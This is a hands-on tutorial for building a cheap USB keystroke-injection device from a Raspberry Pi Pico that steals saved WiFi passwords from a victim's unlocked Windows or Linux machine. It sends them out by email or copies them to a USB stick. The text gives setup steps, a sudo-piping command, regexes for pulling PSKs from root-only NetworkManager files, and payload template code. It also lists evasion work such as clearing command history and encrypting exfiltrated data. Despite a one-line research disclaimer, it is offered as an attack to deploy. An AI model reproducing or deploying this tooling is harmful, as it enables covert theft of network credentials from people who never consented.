Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? Today, you will build exactly that.
⚠️ Disclaimer: All content in this project is intended for security research purposes only.
- WiFi password stealer
During the summer of 2022, I decided to do exactly that: build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text, I will explain all of the necessary steps, theory, and nuances when it comes to building your own keystroke injection tool. While this project focuses on WiFi passwords, the payload code could easily be altered to do something more nefarious. You are only limited by your imagination and your technical skills.
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for the Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
- Physical access to the victim's unlocked computer.
- Internet access on the victim's computer, so the stolen data can be sent using SMTP (exfiltration over a network medium).
- Knowledge of the victim's account password for the Linux exploit.
- Raspberry Pi Pico (RPi Pico)
- Micro USB to USB Cable
- Jumper Wire (optional)
- pico-ducky: firmware that turns the RPi Pico into a USB Rubber Ducky
- USB flash drive (for the exploit over a physical medium only)
📝 Note:
It is possible to build this tool with an actual Rubber Ducky, but keep in mind that the RPi Pico costs about $4.00 while the Rubber Ducky costs about $80.00.
However, while pico-ducky is a good and budget-friendly solution, the Rubber Ducky does offer things like stealthiness and support for the latest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico, you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
A keystroke injection tool, once connected to a host machine, executes malicious commands by sending input that mimics keystrokes typed by a user. While it looks like a USB drive, it acts like a keyboard that types a preprogrammed payload. Tools like the Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy the payload with ease.
The payload uses the `STRING` command to inject keystrokes. It accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. `ENTER` and `SPACE` simulate a press of the corresponding key.
We use the `DELAY` command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element, such as a command prompt, to load. A delay is also useful at the very beginning, right after the new USB device is connected to the targeted computer: the computer must complete a set of actions (device enumeration, driver binding) before it can accept input. For HIDs the setup time is very short, in most cases a fraction of a second, because the drivers are built in. However, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay according to your target.
Data exfiltration is the unauthorized transfer of data from a computer or device. Once the data is collected, an adversary can package it, using encryption or compression, to avoid detection while sending it over the network. The two most common ways of exfiltration are:
- Exfiltration over a network medium. This approach was used for the Windows exploit. The whole payload can be seen here.
- Exfiltration over a physical medium. This approach was used for the Linux exploit. The whole payload can be seen here.
In order to use the Windows payload (`payload1.dd`), you don't need to connect any jumper wire between pins.
Once the passwords have been exported to the `.txt` file, the payload sends the data to the appointed email address using Yahoo SMTP. For more detailed instructions, visit the following link. The payload template also needs to be updated with your SMTP information, meaning you need to set `RECEIVER_EMAIL`, `SENDER_EMAIL`, and your email `PASSWORD`. In addition, you can also change the body and the subject of the email.
📝 Note:
After the data has been sent by email, the `.txt` file is deleted. You can also use the SMTP server of another email provider, but be mindful of the SMTP server hostname and port number you write into the payload.
Keep in mind that some networks block connections to unknown SMTP servers at the firewall. Also keep in mind that the sender account's credentials sit in plaintext in the payload on the Pico, so use a dedicated throwaway account.
In order to use the Linux payload (`payload2.dd`) you need to connect a jumper wire between `GND` and `GPIO5`, to match the pin check in `code.py` on your RPi Pico. For more information about how to set up multiple payloads on your RPi Pico, visit this link.
Once the passwords have been exported from the computer, the data is saved to the designated USB flash drive. For this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace `USBSTICK` with the name of your USB drive in two places.
In addition, you will also need to update the Linux `PASSWORD` in the payload in three places. As stated above, for this exploit to succeed you need to know the victim's Linux password, and the account must be allowed to use `sudo`, which makes this attack less plausible.
To run the `wifi_passwords_print.sh` script by hand, first update the script with the correct name of your USB stick, then type the following command in your terminal:

```sh
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
```

where `PASSWORD` is your account's password and `USBSTICK` is the name of your USB device. Piping the password into `sudo -S` like this leaves it in your shell history, which is what the command history clean-up and `sudo` avoidance items on the to-do list address.
NetworkManager is based on the concept of connection profiles and uses plugins for reading and writing them. The keyfile plugin stores profiles in an `.ini`-style keyfile format and supports all connection types and capabilities NetworkManager has. The files are located in `/etc/NetworkManager/system-connections/` and are readable by root only, which is why the payload needs `sudo`. Based on the keyfile format, the payload uses `grep` with a regex to extract the data of interest. For filtering, a positive lookbehind assertion (`(?<=keyword)`) is used: the lookbehind matches at the position right after the keyword without making the keyword itself part of the match, so `(?<=keyword).*` matches all text after the keyword up to the end of the line. This lets the payload extract the values after the `ssid=` and `psk=` (pre-shared key) keys. Lookbehind is a PCRE feature, so this requires `grep -P` (GNU grep); `grep -E` will not accept it.
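As an added example (not the project's `wifi_passwords_print.sh`), the following Python applies the same positive-lookbehind regex to constructed keyfiles and compares it with reading the `.ini` structure directly. It also covers two cases the plain `grep` approach handles badly: a lookbehind on the bare keyword `psk` also matches the `psk-flags=` line and the `key-mgmt=wpa-psk` line, and a profile with `psk-flags=1` keeps its secret in a user-session agent rather than in the file, so there is no `psk=` line to find at all. The three profiles are constructed samples; real ones live as root-only files under `/etc/NetworkManager/system-connections/`.

```python
"""SSID / PSK extraction from NetworkManager keyfiles (added example, not project code)."""
from __future__ import annotations
import configparser
import re

# Constructed keyfile profiles in the format written by NetworkManager's keyfile plugin.
HOME = """[connection]
id=HomeNet
type=wifi

[wifi]
mode=infrastructure
ssid=HomeNet

[wifi-security]
key-mgmt=wpa-psk
psk=correct horse battery staple
"""

AGENT_OWNED = """[connection]
id=Office
type=wifi

[wifi]
ssid=Office

[wifi-security]
key-mgmt=wpa-psk
psk-flags=1
"""

OPEN = """[connection]
id=Cafe
type=wifi

[wifi]
ssid=Cafe
"""

# The lookbehind anchors just after the key; '.*' then takes the rest of that line.
# '^' (with re.M) keeps 'psk=' from matching inside some other key's value.
SSID_RE = re.compile(r"(?<=^ssid=).*", re.M)
PSK_RE = re.compile(r"(?<=^psk=).*", re.M)
NAIVE_PSK_RE = re.compile(r"(?<=psk).*", re.M)   # keyword without '=': over-matches


def grep_style(keyfile: str) -> tuple[str | None, str | None]:
    """What 'grep -oP' with the two lookbehinds would return for one file."""
    ssid = SSID_RE.search(keyfile)
    psk = PSK_RE.search(keyfile)
    return (ssid.group(0) if ssid else None, psk.group(0) if psk else None)


def parsed(keyfile: str) -> dict:
    """Same data via the keyfile's .ini structure, plus where the secret actually lives."""
    cp = configparser.ConfigParser(interpolation=None)   # a PSK may legitimately contain '%'
    cp.read_string(keyfile)
    ssid = cp.get("wifi", "ssid", fallback=None)
    psk = cp.get("wifi-security", "psk", fallback=None)
    flags = cp.get("wifi-security", "psk-flags", fallback="0")
    if not cp.has_option("wifi-security", "key-mgmt"):
        secret = "none"      # open network, nothing stored
    elif psk is not None:
        secret = "file"      # stored in the keyfile, readable by root
    elif flags != "0":
        secret = "agent"     # psk-flags=1: held by a user-session secret agent, not on disk
    else:
        secret = "missing"
    return {"ssid": ssid, "psk": psk, "secret": secret}


def report(keyfiles: list[str]) -> list[str]:
    """One 'SSID: ... | PSK: ...' line per profile, marking secrets that are not in the file."""
    lines = []
    for kf in keyfiles:
        p = parsed(kf)
        psk = p["psk"] if p["psk"] is not None else f"<{p['secret']}>"
        lines.append(f"SSID: {p['ssid']} | PSK: {psk}")
    return lines


if __name__ == "__main__":
    print("\n".join(report([HOME, AGENT_OWNED, OPEN])))
    print("naive 'psk' lookbehind on the agent-owned profile:", NAIVE_PSK_RE.findall(AGENT_OWNED))
```

The `configparser` path is the one to prefer when a profile has no `psk=` line: it tells you whether the network is open or whether the key is agent-owned, where the `grep` approach just prints nothing.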
For more information about NetworkManager, here are some useful links:
Below is an example of the exfiltrated and formatted data from a victim's machine in a `.txt` file.
One advantage of the Rubber Ducky over the RPi Pico is that it doesn't show up as a USB mass storage device once plugged in; the machine only sees a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, connect a jumper wire between pin 18 (`GND`) and pin 20 (`GPIO15`). For more details visit this link.
💡 Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
When creating a functioning payload file, you can use the `writer.py` script or manually edit the template file. To run the script successfully you need to pass, in addition to the script file name, the name of the OS (`windows` or `linux`) and the name of the payload file (e.g. `payload1.dd`). Below is an example of how to run the writer script to create a Windows payload:

```sh
python3 writer.py windows payload1.dd
```
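As an added example (not the project's `writer.py` or its templates), the following Python does the placeholder substitution the text describes, with the checks an operator would want before copying a payload to the Pico: every placeholder is present in the template, no value contains a line break (a `STRING` line types exactly one line), and the occurrence counts match what is expected (two `USBSTICK`, three `PASSWORD` for the Linux template). Substitution is done in a single regex pass so a value that happens to contain another placeholder's name is inserted literally and never expanded. The two templates and the `/media/$USER/USBSTICK` mount path are constructed assumptions.

```python
"""Placeholder substitution for DuckyScript payload templates (added example, not writer.py)."""
from __future__ import annotations
import re
import sys

# Placeholder names used by the README for each payload.
PLACEHOLDERS = {
    "windows": ("RECEIVER_EMAIL", "SENDER_EMAIL", "PASSWORD"),
    "linux": ("USBSTICK", "PASSWORD"),
}

# Constructed templates; the real payload1.dd / payload2.dd are not reproduced here.
TEMPLATES = {
    "windows": """REM constructed Windows template
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1500
STRING $from='SENDER_EMAIL'; $to='RECEIVER_EMAIL'; $pw='PASSWORD'
ENTER
REM export and mail steps would follow here
""",
    "linux": """REM constructed Linux template (mount path is an assumption)
DELAY 1000
CTRL-ALT t
DELAY 1500
STRING echo PASSWORD | sudo -S mkdir -p /media/$USER/USBSTICK/loot
ENTER
STRING echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
ENTER
STRING echo PASSWORD | sudo -S sync
ENTER
""",
}


def count_placeholders(template: str, os_name: str) -> dict[str, int]:
    """How many times each placeholder for os_name occurs in the template."""
    return {name: template.count(name) for name in PLACEHOLDERS[os_name]}


def fill(template: str, os_name: str, values: dict[str, str],
         expected: dict[str, int] | None = None) -> str:
    """Return the template with every placeholder replaced by the operator's value."""
    names = PLACEHOLDERS[os_name]
    missing = [n for n in names if n not in values]
    if missing:
        raise ValueError(f"no value given for {', '.join(missing)}")
    for name, value in values.items():
        if "\n" in value or "\r" in value:
            raise ValueError(f"{name}: a STRING line cannot contain a line break")
    for name, n in count_placeholders(template, os_name).items():
        if n == 0:
            raise ValueError(f"{name}: placeholder not present in template")
        if expected and name in expected and n != expected[name]:
            raise ValueError(f"{name}: found {n} time(s), expected {expected[name]}")
    # One regex pass, longest name first; the callable's return value is inserted
    # literally, so a value containing e.g. 'PASSWORD' is not substituted again.
    pattern = re.compile("|".join(re.escape(n) for n in sorted(names, key=len, reverse=True)))
    return pattern.sub(lambda m: values[m.group(0)], template)


def write_payload(os_name: str, out_path: str, values: dict[str, str]) -> int:
    """Mirror writer.py's calling convention (OS name + output file); returns characters written."""
    payload = fill(TEMPLATES[os_name], os_name, values)
    with open(out_path, "w", newline="\n") as fh:
        return fh.write(payload)


if __name__ == "__main__":
    # usage: python3 this.py linux payload2.dd USBSTICK=KINGSTON PASSWORD=hunter2
    os_name, out_path, *pairs = sys.argv[1:]
    write_payload(os_name, out_path, dict(p.split("=", 1) for p in pairs))
```

Passing the values on the command line, as the usage line shows, puts the password into your own shell history; for anything beyond a lab run, read them from a file or prompt for them instead.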
The payloads are OS-specific: the Windows payload works only on Windows, and the Linux payload only on Linux systems that store their profiles in NetworkManager keyfiles. This attack requires physical access to an unlocked device in order to be deployed successfully.
The Linux exploit is far less likely to succeed, because you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.
The machine's firewall or the network's firewall may prevent stolen data from being sent over the network medium.
Payload delays could be inadequate, because the computers the attack is deployed on run at different speeds.
The pico-ducky device isn't stealthy at all; it's quite bulky, especially if you solder the pins.
Also, the pico-ducky device is noticeably slower than the Rubber Ducky running the same script.
If `Caps Lock` is on, some of the payload code will not be executed and the exploit will fail (letters typed via `STRING` come out with inverted case). If the computer uses a non-English environment, this exploit won't succeed either, because the keystrokes are sent as US-layout key codes.
Currently, pico-ducky doesn't support DuckyScript 3.0; only DuckyScript 1.0 can be used. If you need version 3.0, you will have to use the Rubber Ducky.
- Fix `Caps Lock` bug.
- Fix non-English environment bug.
- Obfuscate the command prompt.
- Implement exfiltration over a physical medium.
- Create a payload for Linux.
- Encode/encrypt exfiltrated data before sending it over email.
- Implement an indicator of a successfully completed exploit.
- Implement command history clean-up for the Linux exploit.
- Enhance the Linux exploit to avoid the use of `sudo`.